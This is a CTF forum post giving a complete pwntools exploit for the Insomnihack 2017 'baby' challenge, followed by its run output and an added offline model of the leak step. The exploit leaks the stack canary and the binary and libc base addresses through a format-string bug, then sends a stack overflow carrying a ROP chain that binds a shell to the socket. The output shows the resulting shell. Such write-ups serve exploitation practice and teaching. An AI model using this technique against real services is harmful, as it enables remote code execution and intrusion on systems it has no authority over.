[insomnihack teaser 2017] baby

Practice area for solving hacking-competition (CTF) problems

Post by amesianx » Wed Jan 25, 2017 1:56 am

Exploiting it the easy way with pwntools.. :D

Code:

from pwn import *

# Written for Python 2 and the pwntools of early 2017 (str-based I/O).
context.clear(arch='amd64')

elf = ELF('./baby')
libc = ELF('./libc.so')

# Offset (inside libc.so) of the return address into __libc_start_main.
# It is specific to the libc build; change it for your own libc.
start_main_ret = 0x21f45

# conn = remote('baby.teaser.insomnihack.ch', 1337)
conn = remote('localhost', 1337)
print conn.recvuntil("Your choice >")

# Menu option 2 = format string. Use it to leak the stack canary, a return
# address inside the PIE binary and a return address inside libc.
conn.send('2\n')
print conn.recvuntil("Your format >")

"""
# One-time search for the stack slots holding the libc / elf addresses:
# dump each positional argument as a 16-digit hex qword and compare its low
# 12 bits (the page offset, which ASLR does not change) with the expected value.
i = 130
while i < 200:
  fmt = '%' + str(i) + '$.16lx'
  conn.send('A'*8 + ':' + fmt + '\n')
  c = conn.recvuntil("Your format >")
  c = c.split(':')[1].strip()
  c = c.split('\n')[0].strip()
  c = int(c, 16)
  # if (c & 0x9cf) == 0x9cf:
  if (c & 0xfff) == 0xf45:
    print 'found is ' + str(i)
    break
  i += 1
"""

# Slots found with the search above: 138 = canary, 140 = return address into
# the binary, 158 = return address into __libc_start_main.
conn.send('%138$.16lx_%140$.16lx_%158$.16lx_\n')
c = conn.recvuntil("Your format >")

canary = c.split('_')[0]
ret_addr = c.split('_')[1]
libc_base = c.split('_')[2]

canary = int(canary, 16)
ret_addr = int(ret_addr, 16)
libc_base = int(libc_base, 16) - start_main_ret
# 0x19cf = offset of the leaked return address from the binary's load base
elf_base = ret_addr - 0x19cf

print 'canary is ' + str(hex(canary))
print 'return is ' + str(hex(ret_addr))
print 'libc base is ' + str(hex(libc_base))
print 'elf base is ' + str(hex(elf_base))
conn.send('\n')                      # empty format returns to the menu
print conn.recvuntil("Your choice >")
conn.send('1\n')                     # menu option 1 = stack overflow
print conn.recvuntil("How much bytes you want to send ? ")

# Rebase both ELF objects at the leaked addresses so that every symbol and
# gadget pwntools resolves below is an absolute address.
elf.address = elf_base
libc.address = libc_base

rop = ROP(libc)

# The chain assumes the connected socket is fd 4: duplicate it over
# stderr/stdout/stdin so the shell started by system() talks to us.
rop.dup2(4, 2)
rop.dup2(4, 1)
rop.dup2(4, 0)

# Echo the banner string back as a visible sign that the chain is running.
s = "Welcome to baby's first pwn."
rop.write(4, next(elf.search(s)), len(s))
rop.system(next(libc.search('/bin/sh\x00')))
print rop.dump()

# 1032 bytes of filler up to the canary, the leaked canary, a dummy saved
# rbp, then the ROP chain in place of the saved return address.
payload = '\x41'*1032 + p64(canary) + p64(0) + rop.chain()

conn.send(str(len(payload)) + '\n')
conn.send(payload)

conn.interactive()
conn.close()


[result]

root@USER ~/.project/CTF
# python ex.py
[+] Opening connection to localhost on port 1337: Done
Welcome to baby's first pwn.
Pick your favorite vuln :
   1. Stack overflow
   2. Format string
   3. Heap Overflow
   4. Exit
Your choice >
 Simply type '\n' to return
Your format >
canary is 0x9e907d5611d90900
return is 0x7f2d640019cf
libc base is 0x7f2d63830000
elf base is 0x7f2d64000000
 Welcome to baby's first pwn.
Pick your favorite vuln :
   1. Stack overflow
   2. Format string
   3. Heap Overflow
   4. Exit
Your choice >
 How much bytes you want to send ?
[*] Loaded cached gadgets for './libc.so'
0x0000:   0x7f2d63852b9a pop rdi; ret
0x0008:              0x4
0x0010:   0x7f2d63854885 pop rsi; ret
0x0018:              0x2
0x0020:   0x7f2d6391be90 dup2
0x0028:   0x7f2d6383028f <adjust: ret>
0x0030:   0x7f2d63852b9a pop rdi; ret
0x0038:              0x4
0x0040:   0x7f2d63854885 pop rsi; ret
0x0048:              0x1
0x0050:   0x7f2d6391be90 dup2
0x0058:   0x7f2d6383028f <adjust: ret>
0x0060:   0x7f2d63852b9a pop rdi; ret
0x0068:              0x4
0x0070:   0x7f2d63854885 pop rsi; ret
0x0078:              0x0
0x0080:   0x7f2d6391be90 dup2
0x0088:   0x7f2d6383028f <adjust: ret>
0x0090:   0x7f2d63852b9a pop rdi; ret
0x0098:              0x4
0x00a0:   0x7f2d63854885 pop rsi; ret
0x00a8:   0x7f2d64001e30
0x00b0:   0x7f2d63831b8e pop rdx; ret
0x00b8:             0x1c
0x00c0:   0x7f2d6391b700 write
0x00c8:   0x7f2d6383028f <adjust: ret>
0x00d0:   0x7f2d63852b9a pop rdi; ret
0x00d8:   0x7f2d639ac8c3
0x00e0:   0x7f2d63876590 system
0x00e8:       'iaacjaac' <pad>
[*] Switching to interactive mode
Good luck !
Welcome to baby's first pwn.$ ls -al
total 36
drwxr-xr-x 2 baby baby     0  Jan 24 23:37 .
drwxr-xr-x 2 root root     0  Jan 23 06:21 ..
-rw-r--r-- 1 baby baby   220  Jan 22 00:45 .bash_logout
-rw-r--r-- 1 baby baby  3637  Jan 22 00:45 .bashrc
-rw------- 1 root root   824  Jan 22 06:35 .gdb_history
-rw-r--r-- 1 baby baby   675  Jan 22 00:45 .profile
-rwxrwxrwx 1 root root 17840  Jan 21 22:39 baby
-rw-rw-rw- 1 root root    71  Jan 22 06:05 peda-session-baby.txt
$
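
The leak step of the script above, as an added example that is not part of amesianx's post: an offline model of the format-string offset search and of the base recovery. It assumes the two offsets the script uses (0x21f45 for the return into __libc_start_main, 0x19cf for the leaked return address relative to the binary's base) and a constructed stack image that reproduces the three qwords from the run shown in the post; the real exploit obtains the same values with '%N$.16lx' over the socket. It goes one step further than the script by also checking that the recovered bases are page aligned, which is the quickest way to notice that an offset belongs to a different libc or binary build.

```python
# Added example, not amesianx's script: offline model of the format-string
# leak and base recovery. A constructed stack image stands in for the target;
# the real exploit gets each value with '%N$.16lx' over the socket.
import re

PAGE = 0x1000
# Offsets assumed from the post (they are libc- and binary-specific):
LIBC_START_MAIN_RET = 0x21f45   # return into __libc_start_main, inside libc.so
RET_OFF_IN_ELF = 0x19cf         # leaked return address relative to the ELF base

# Constructed stack image, keyed by printf positional-argument number.
# The three interesting qwords use the values from the run in the post.
LIBC_BASE = 0x7f2d63830000
ELF_BASE = 0x7f2d64000000
STACK = {i: 0x4141414141414141 for i in range(1, 200)}
STACK[138] = 0x9e907d5611d90900              # canary: lowest byte is NUL
STACK[140] = ELF_BASE + RET_OFF_IN_ELF        # return address into the binary
STACK[158] = LIBC_BASE + LIBC_START_MAIN_RET  # return address into libc


def fake_target(fmt):
    """Answer 'AAAAAAAA:%N$.16lx\\n' the way the vulnerable printf would."""
    n = int(re.search(r'%(\d+)\$\.16lx', fmt).group(1))
    return 'AAAAAAAA:%016x\nYour format >' % STACK.get(n, 0)


def parse_leak(response):
    """Extract the hex qword that follows the ':' marker, as the script does."""
    return int(response.split(':')[1].split('\n')[0].strip(), 16)


def find_offset(query, predicate, lo=130, hi=200):
    """Walk positional args lo..hi-1 until predicate(value) holds.
    Mirrors the commented-out search loop in the post."""
    for i in range(lo, hi):
        value = parse_leak(query('A' * 8 + ':' + '%%%d$.16lx\n' % i))
        if predicate(value):
            return i, value
    return None, None


# ASLR moves whole pages, so the low 12 bits of a code address never change;
# that is what the script's '(c & 0xfff) == 0xf45' test relies on.
def looks_like_libc_ret(v):
    return (v & 0xfff) == (LIBC_START_MAIN_RET & 0xfff) and (v >> 40) == 0x7f


def looks_like_elf_ret(v):
    return (v & 0xfff) == (RET_OFF_IN_ELF & 0xfff) and (v >> 40) == 0x7f


def looks_like_canary(v):
    # glibc stack canaries keep their lowest byte zero so that string
    # functions stop on them; the remaining bytes are random.
    return (v & 0xff) == 0 and (v >> 8) != 0


def offsets_consistent(ret_addr, libc_leak):
    """Load bases are page aligned; a wrong symbol offset shows up here."""
    return ((ret_addr - RET_OFF_IN_ELF) % PAGE == 0
            and (libc_leak - LIBC_START_MAIN_RET) % PAGE == 0)


def recover_bases(ret_addr, libc_leak):
    if not offsets_consistent(ret_addr, libc_leak):
        raise ValueError('bases not page aligned: wrong offsets for this build?')
    return ret_addr - RET_OFF_IN_ELF, libc_leak - LIBC_START_MAIN_RET


def run(query=fake_target):
    canary_idx, canary = find_offset(query, looks_like_canary)
    ret_idx, ret_addr = find_offset(query, looks_like_elf_ret)
    libc_idx, libc_leak = find_offset(query, looks_like_libc_ret)
    elf_base, libc_base = recover_bases(ret_addr, libc_leak)
    return {
        'canary': (canary_idx, canary),
        'ret': (ret_idx, ret_addr),
        'libc_leak': (libc_idx, libc_leak),
        'elf_base': elf_base,
        'libc_base': libc_base,
    }


if __name__ == '__main__':
    for k, v in run().items():
        print(k, (v[0], hex(v[1])) if isinstance(v, tuple) else hex(v))
```

To use the same search against a live target, pass a `query` function that sends the format string over the socket and returns everything up to the next "Your format >" prompt; the predicates and the alignment check stay as they are.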
